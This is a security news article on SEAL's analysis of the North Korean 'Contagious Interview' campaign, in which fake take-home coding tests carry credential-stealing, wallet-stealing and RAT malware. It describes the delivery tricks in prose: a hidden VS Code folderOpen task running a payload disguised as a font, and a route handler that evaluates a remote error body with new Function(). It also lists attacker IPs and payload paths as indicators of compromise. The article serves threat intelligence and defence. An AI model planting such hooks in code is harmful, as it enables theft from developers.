A newly documented campaign dubbed “Contagious Interview” shows North Korean threat actors weaponising developer tooling and code-repository workflows to steal credentials, cryptocurrency wallets and establish remote access even when victims never “run” the code they are sent.
In a recent case analysed by SEAL, a malicious Bitbucket repository (hxxps://bitbucket[.]org/0xmvptechlab/ctrading) was delivered as a take‑home technical assessment to a developer via LinkedIn.
Over the past month alone, three separate victims contacted SEAL after suffering significant financial losses, all following an almost identical social‑engineering script and technical footprint.
At the core of the campaign is a “dual‑stack” malware architecture combining a Node.js layer (BeaverTail) and a Python layer (InvisibleFerret variant).
Similar lures were sent as “code review” or “partnership” requests to security researchers and company engineers, using compromised or fabricated recruiter personas with large follower counts are noted.
Inside the “Contagious Interview” operation
The Node.js component executes immediately upon infection, stealing credentials, logging keystrokes, looting LevelDB browser and wallet data, and spinning up a covert RAT under the victim’s ~/.npm directory.
It drops or uses multiple modules: a keylogger and screenshotter that exfiltrate to 172.86.116.178, a file grabber focused on developer secrets (.env, .ssh, wallet and config paths), a clipboard clipper for crypto addresses, a browser credential stealer and a full socket‑based remote shell.
The Python layer, staged via an obfuscated “.nlp” script, establishes a parallel surveillance stack under ~/.n2 and ~/.n3.
The primary module, way.py, acts as a RAT and wallet stealer, killing Chrome/Brave to release locks on LevelDB so the Node.js side can copy active wallet databases into a hidden staging folder.
A second module, pow.py, focuses on mining and persistence on Windows abusing Startup folder scripts, a “Runtime Broker” scheduled task and Windows Defender exclusion rules to keep an XMRig miner (masquerading as msedge.exe) alive across reboots.
On Linux and macOS, pow.py fails early due to Windows‑specific imports, limiting automated persistence but not the initial theft.
Initial access is achieved through tightly integrated “code abuse” rather than traditional exploits. The ctrading project embeds malware through three vectors, two of which were actively used: a VS Code Task Hijack and an application‑logic hook.
A hidden .vscode/tasks.json entry labelled “eslint-check” is set to runOn: folderOpen and points directly to a JavaScript payload disguised as a font file (public/font/fa-brands-regular.woff2).
Job interviews become malware traps
For targets who avoid automatic tasks, a backup trigger lives in server/routes/api/profile.js, where a getPassport function contacts a typosquatted domain (chainlink-api-v3[.]com) and passes the error body into a dynamic new Function() constructor.
A third vector, an npm dependency (grayavatar) that abuses child_process to execute obfuscated JavaScript, appears to be an artefact from earlier campaigns and was removed from npm at the time of analysis.
SEAL’s forensic review of filesystem artefacts, process lists and lock files shows the malware strongly prioritises one‑time theft of data, credentials and wallet contents over long‑term stable persistence, especially on non‑Windows platforms.
On Linux and macOS, execution is primarily in memory via node -e and Python processes under ~/.n2, coordinated with lock files such as ~/.npm/vhost.ctl and npm-compiler.log.
Nevertheless, each victim’s environment contained the same Indicators of Compromise, and commit metadata for the ctrading repository pointed consistently to a Korea Standard Time (UTC+9) configuration.
Attribution to DPRK operators is assessed with high confidence. The LinkedIn persona “John Meltzer” and the “Meta2140” project appear to be fully controlled by North Korean IT workers, with repository commit author “Pietro” (github.com/pietroETH, linked to multiple email aliases) overlapping with infrastructure and identities previously seen in the fraudulent “Ultra-X” project.
Combined with the infrastructure reuse, timezone artefacts and social‑engineering playbook, SEAL links this cluster to known DPRK IT activity dating back to at least early 2024.
For developers and security teams, the case is a stark reminder that simply cloning a repository and enabling VS Code “Trusted Workspace” can be enough to trigger code‑execution chains hidden in IDE tasks and application error handlers no manual npm start required.
Enforcing strict VS Code workspace trust controls, disabling automatic tasks, and routinely scanning for hidden artefacts such as ~/.n2, ~/.n3, ~/.nlp and anomalous ~/.npm contents are now essential hygiene for anyone handling unsolicited code in a professional context.
IOCs
| URL / IP | Path | Port | Stage / Function |
|---|---|---|---|
| chainlink-api-v3.com | /api/service/token/… | 80 | Stage 1 & 5: Delivers JS payload via Error 404 |
| 146.70.253.107 | /client/5346/1014 | 1224 | Stage 2: Downloads Python Stager (.nlp) |
| 146.70.253.107 | /payload/5346/1014 | 1224 | Stage 3: Downloads RAT (way) |
| 146.70.253.107 | /brow/5346/1014 | 1224 | Stage 3: Downloads Miner (pow) |
| 146.70.253.107 | /keys | 2242 | RAT: Data exfiltration & Command channel |
| 172.86.116.178 | /api/service/process | 5918 | Node RAT: vhost.ctl communication |
| 172.86.116.178 | /upload | 5978 | Exfiltration: Screenshot/Clipboard upload |
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.